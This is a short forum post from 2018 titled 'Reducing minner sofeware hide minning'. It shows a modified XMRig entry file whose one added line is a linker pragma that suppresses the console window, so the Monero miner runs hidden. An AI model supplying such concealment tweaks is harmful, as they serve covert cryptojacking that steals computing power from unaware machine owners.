Author

Topic: Reducing minner sofeware hide minning (Read 84 times)

copper member
Activity: 24
Merit: 0
June 17, 2018, 09:59:03 AM
#1
EX XMRIG
 *   You should have received a copy of the GNU General Public License
 *   along with this program. If not, see .
 */
//add code

#include "stdafx.h"
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )




#include "App.h"


int main(int argc, char **argv) {
    App app(argc, argv);

    return app.exec();
}
Jump to: